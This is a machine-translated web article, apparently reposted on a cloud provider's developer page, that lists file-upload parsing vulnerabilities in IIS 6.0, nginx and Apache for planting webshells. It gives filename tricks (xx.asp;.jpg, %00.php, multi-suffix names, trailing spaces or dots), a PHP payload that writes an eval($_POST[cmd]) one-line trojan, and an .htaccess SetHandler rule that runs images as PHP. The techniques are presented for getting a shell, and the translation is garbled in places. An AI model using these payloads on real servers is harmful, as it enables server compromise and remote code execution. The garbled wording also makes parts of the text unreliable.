Home > Developer > Web Develop
There are two ways to use IIS 6.0 parsing
1. Directory resolution
/xx.asp/xx.jpg
2. File parsing
wooyun.asp;. Jpg
First, the folder under the Web site name is. asp,. ASA, and any file extension within its directory is parsed and executed by IIS as an ASP file.
For example, if you create a directory wooyun.asp
/wooyun.asp/1.jpg
will be executed as an ASP file. Assuming that the black-wide can control the upload folder path, you can no matter when you upload your image to change the name can take the shell.
The second, under IIS6.0, is not parsed after the semicolon, which means
wooyun.asp;. Jpg
will be viewed by the server as Wooyun.asp
and the IIS6.0 default executable file, in addition to ASP, contains these three kinds of
/wooyun.asa
/wooyun.cer
/wooyun.cdx
IIS 6.0 parsing vulnerability exploits case on dark clouds
http://www.wooyun.org/searchbug.php?q=IIS6.0
Second, IIS 7.0/nginx <8.03 Malformed Parsing vulnerability
Nginx Parsing vulnerability This great loophole is China security organization 80sec discovered ...
In the default fast-cgi, black-wide upload a name of wooyun.jpg, the content is
1 <? PHP fputs (fopen (' shell.php ', ' W '), ' <?php eval ($_post[cmd])?> ');? >
The file and then access wooyun.jpg/x.php, in this directory will generate a word trojan shell.php
This vulnerability case
Wooyun: UF software a sub-station SQL Injection Vulnerability +nginx Parsing vulnerability
Wooyun: Sina Network substation multiple security loopholes (Nginx analysis +sql injection, etc.) small package
WooYun:kingsoft.com an X-level domain name nginx Parsing Vulnerability + burst path
Three, Nginx <8.03 null-byte code execution vulnerability
Impact Version:
0.5.,0.6, 0.7 <= 0.7.65, 0.8 <= 0.8.37 Nginx embed PHP code in the image and then access xxx.jpg%00.php to execute the code in the Nginx null byte generation execution vulnerability case HTTP://WWW.WO oyun.org/searchbug.php?q=%2500.php
Iv. Apache Parsing Vulnerability
Apache is from right to left to judge the resolution, if it is not recognized parsing, then left to judge.
For example, Wooyun.php.owf.rar ". Owf" and ". rar" are two suffixes that Apache cannot identify, and Apache interprets Wooyun.php.owf.rar as PHP.
How to determine whether the legal suffix is the key to exploit the vulnerability, test can try to upload a wooyun.php.rara.jpg.png ... (Write down the common suffixes you know ...) ) to test whether it is a valid suffix
Apache Parsing Vulnerability Case
[Space] or xx.jpg. These two types of files are not allowed to exist, if so named, Windows will default to remove spaces or points, the hacker can catch the packet, after the file name with a space or point to bypass the blacklist. If the upload succeeds, the spaces and dots will be automatically removed by Windows, which can also be getshell.
If it is in Apache. htaccess can be executed. and can be uploaded. You can try writing in. htaccess:
SetHandler application/x-httpd-php
Then upload shell.jpg Trojan, so that the shell.jpg can be parsed into PHP files.
Various parsing vulnerability Acquisition Webshell
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
